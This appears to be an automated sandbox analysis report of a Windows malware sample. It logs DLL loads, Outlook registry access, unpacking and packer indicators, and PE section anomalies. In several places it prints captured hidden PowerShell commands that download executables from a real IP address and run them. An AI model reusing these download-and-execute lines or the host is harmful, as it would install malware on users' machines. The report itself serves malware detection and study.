Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: random.exe

Static file information: File size 1864704 > 1048576

Source: random.exe

Static PE information: Raw size of ixwuewww is bigger than: 0x100000 < 0x19a600

Source:	Binary string: mozglue.pdbP source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196397263.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: nss3.pdb@ source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: BitLockerToGo.pdb source: f2d6093d56.exe, 00000035.00000002.2949636350.000000000A250000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 0000001B.00000003.2299866873.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 0000001B.00000002.2434685654.0000000000322000.00000040.00000001.01000000.00000017.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 00000022.00000002.2403887822.0000000000322000.00000040.00000001.01000000.00000017.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 00000022.00000003.2359065116.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE, 00000036.00000002.2525863117.0000000000382000.00000040.00000001.01000000.0000001B.sdmp, Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE, 00000036.00000003.2485387090.0000000005260000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196397263.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: f2d6093d56.exe, 00000035.00000002.2949636350.000000000A250000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Unpacked PE file: 2.2.4CAJNBDWED5ZLJ2B.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;exzbwtwb:EW;gokqnofo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;exzbwtwb:EW;gokqnofo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Unpacked PE file: 3.2.ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wskuzfvh:EW;nsutdxwr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wskuzfvh:EW;nsutdxwr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.1b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wskuzfvh:EW;nsutdxwr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wskuzfvh:EW;nsutdxwr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 8.2.skotes.exe.1b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wskuzfvh:EW;nsutdxwr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wskuzfvh:EW;nsutdxwr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Unpacked PE file: 27.2.TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE.320000.0.unpack :EW;.rsrc:W;.idata :W;mmqmrfzr:EW;jttopnjv:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Unpacked PE file: 34.2.TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE.320000.0.unpack :EW;.rsrc:W;.idata :W;mmqmrfzr:EW;jttopnjv:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 42.2.483d2fa8a0d53818306efeb32d3.exe.50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wskuzfvh:EW;nsutdxwr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wskuzfvh:EW;nsutdxwr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Unpacked PE file: 54.2.Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE.380000.0.unpack :EW;.rsrc:W;.idata :W;mmqmrfzr:EW;jttopnjv:EW;.taggant:EW; vs :ER;.rsrc:W;

.NET source code contains method to dynamically call methods (often used by packers)

Source: random[2].exe.11.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 095fb861eb.exe.11.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 1AWhJsY[1].exe.11.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 1AWhJsY.exe.11.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 1AWhJsY[1].exe.11.dr, eRtoUikQAUlfmrcXhP.cs	.Net Code: h2NYbtd44f
Source: 1AWhJsY[1].exe.11.dr, eRtoUikQAUlfmrcXhP.cs	.Net Code: S3B6WIXeQr
Source: 1AWhJsY.exe.11.dr, eRtoUikQAUlfmrcXhP.cs	.Net Code: h2NYbtd44f
Source: 1AWhJsY.exe.11.dr, eRtoUikQAUlfmrcXhP.cs	.Net Code: S3B6WIXeQr

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: random[2].exe.11.dr

Static PE information: 0xDF9E7476 [Fri Nov 19 11:54:30 2088 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 095fb861eb.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xd2e10
Source: Bjkm5hE[1].exe.11.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8
Source: ede25bd9a2.exe.11.dr	Static PE information: real checksum: 0x21031f should be: 0x20f649
Source: random[2].exe0.11.dr	Static PE information: real checksum: 0x21031f should be: 0x20f649
Source: random[1].exe0.11.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: 13426522e9.exe.11.dr	Static PE information: real checksum: 0x1c74fe should be: 0x1c4f67
Source: random[2].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xd2e10
Source: Fe36XBk[1].exe.11.dr	Static PE information: real checksum: 0x220621 should be: 0x21e123
Source: random[1].exe1.11.dr	Static PE information: real checksum: 0xeb12b should be: 0xe2149
Source: Fe36XBk.exe.11.dr	Static PE information: real checksum: 0x220621 should be: 0x21e123
Source: 07ab034c92.exe.11.dr	Static PE information: real checksum: 0xeb12b should be: 0xe2149
Source: random[2].exe1.11.dr	Static PE information: real checksum: 0x1d7ff6 should be: 0x1d7016
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: real checksum: 0x1d70da should be: 0x1d0a12
Source: 1AWhJsY[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xc92ee
Source: 1AWhJsY.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xc92ee
Source: b33114b970.exe.11.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: real checksum: 0x1c520d should be: 0x1c0ca2
Source: 7fOMOTQ.exe.11.dr	Static PE information: real checksum: 0x1d70da should be: 0x1d0a12
Source: 298e6cea90.exe.11.dr	Static PE information: real checksum: 0x1d7ff6 should be: 0x1d7016
Source: cBeNU75.exe.11.dr	Static PE information: real checksum: 0x4fcd9a should be: 0x52652f
Source: random[2].exe2.11.dr	Static PE information: real checksum: 0x1c74fe should be: 0x1c4f67
Source: random.exe	Static PE information: real checksum: 0x1d7112 should be: 0x1d62c0
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: real checksum: 0x20f99e should be: 0x217929
Source: cBeNU75[1].exe.11.dr	Static PE information: real checksum: 0x4fcd9a should be: 0x52652f
Source: Bjkm5hE.exe.11.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8
Source: skotes.exe.3.dr	Static PE information: real checksum: 0x20f99e should be: 0x217929

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: ixwuewww
Source: random.exe	Static PE information: section name: ekgmyypn
Source: random.exe	Static PE information: section name: .taggant
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name:
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name: .idata
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name:
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name: exzbwtwb
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name: gokqnofo
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name: .taggant
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name:
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name: .idata
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name:
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name: wskuzfvh
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name: nsutdxwr
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: skotes.exe.3.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name: .idata
Source: skotes.exe.3.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name: wskuzfvh
Source: skotes.exe.3.dr	Static PE information: section name: nsutdxwr
Source: skotes.exe.3.dr	Static PE information: section name: .taggant
Source: random[1].exe.11.dr	Static PE information: section name: .symtab
Source: f2d6093d56.exe.11.dr	Static PE information: section name: .symtab
Source: random[2].exe0.11.dr	Static PE information: section name:
Source: random[2].exe0.11.dr	Static PE information: section name: .idata
Source: random[2].exe0.11.dr	Static PE information: section name:
Source: random[2].exe0.11.dr	Static PE information: section name: cwmuvuvv
Source: random[2].exe0.11.dr	Static PE information: section name: soccmsdl
Source: random[2].exe0.11.dr	Static PE information: section name: .taggant
Source: ede25bd9a2.exe.11.dr	Static PE information: section name:
Source: ede25bd9a2.exe.11.dr	Static PE information: section name: .idata
Source: ede25bd9a2.exe.11.dr	Static PE information: section name:
Source: ede25bd9a2.exe.11.dr	Static PE information: section name: cwmuvuvv
Source: ede25bd9a2.exe.11.dr	Static PE information: section name: soccmsdl
Source: ede25bd9a2.exe.11.dr	Static PE information: section name: .taggant
Source: random[2].exe1.11.dr	Static PE information: section name:
Source: random[2].exe1.11.dr	Static PE information: section name: .idata
Source: random[2].exe1.11.dr	Static PE information: section name:
Source: random[2].exe1.11.dr	Static PE information: section name: ifqcqdxm
Source: random[2].exe1.11.dr	Static PE information: section name: yincwvgn
Source: random[2].exe1.11.dr	Static PE information: section name: .taggant
Source: 298e6cea90.exe.11.dr	Static PE information: section name:
Source: 298e6cea90.exe.11.dr	Static PE information: section name: .idata
Source: 298e6cea90.exe.11.dr	Static PE information: section name:
Source: 298e6cea90.exe.11.dr	Static PE information: section name: ifqcqdxm
Source: 298e6cea90.exe.11.dr	Static PE information: section name: yincwvgn
Source: 298e6cea90.exe.11.dr	Static PE information: section name: .taggant
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name: .idata
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name: bhaywimc
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name: nbbvkuhp
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name: .taggant
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name: .idata
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name: bhaywimc
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name: nbbvkuhp
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name: .taggant
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name: .idata
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name: apuhhdvg
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name: pzrtjeve
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name: .taggant
Source: Fe36XBk.exe.11.dr	Static PE information: section name:
Source: Fe36XBk.exe.11.dr	Static PE information: section name: .idata
Source: Fe36XBk.exe.11.dr	Static PE information: section name:
Source: Fe36XBk.exe.11.dr	Static PE information: section name: apuhhdvg
Source: Fe36XBk.exe.11.dr	Static PE information: section name: pzrtjeve
Source: Fe36XBk.exe.11.dr	Static PE information: section name: .taggant
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name: .idata
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name: gfrqabhk
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name: clsldkbz
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name: .taggant
Source: Bjkm5hE.exe.11.dr	Static PE information: section name:
Source: Bjkm5hE.exe.11.dr	Static PE information: section name: .idata
Source: Bjkm5hE.exe.11.dr	Static PE information: section name:
Source: Bjkm5hE.exe.11.dr	Static PE information: section name: gfrqabhk
Source: Bjkm5hE.exe.11.dr	Static PE information: section name: clsldkbz
Source: Bjkm5hE.exe.11.dr	Static PE information: section name: .taggant
Source: random[2].exe2.11.dr	Static PE information: section name:
Source: random[2].exe2.11.dr	Static PE information: section name: .idata
Source: random[2].exe2.11.dr	Static PE information: section name:
Source: random[2].exe2.11.dr	Static PE information: section name: stywrpjp
Source: random[2].exe2.11.dr	Static PE information: section name: olfrmynd
Source: random[2].exe2.11.dr	Static PE information: section name: .taggant
Source: 13426522e9.exe.11.dr	Static PE information: section name:
Source: 13426522e9.exe.11.dr	Static PE information: section name: .idata
Source: 13426522e9.exe.11.dr	Static PE information: section name:
Source: 13426522e9.exe.11.dr	Static PE information: section name: stywrpjp
Source: 13426522e9.exe.11.dr	Static PE information: section name: olfrmynd
Source: 13426522e9.exe.11.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_06115E9D push es; iretd	0_3_06115EB0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0611612F push es; iretd	0_3_06116130
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_06116BF5 push es; iretd	0_3_06116C08

Source: random.exe	Static PE information: section name: entropy: 7.981931578414723
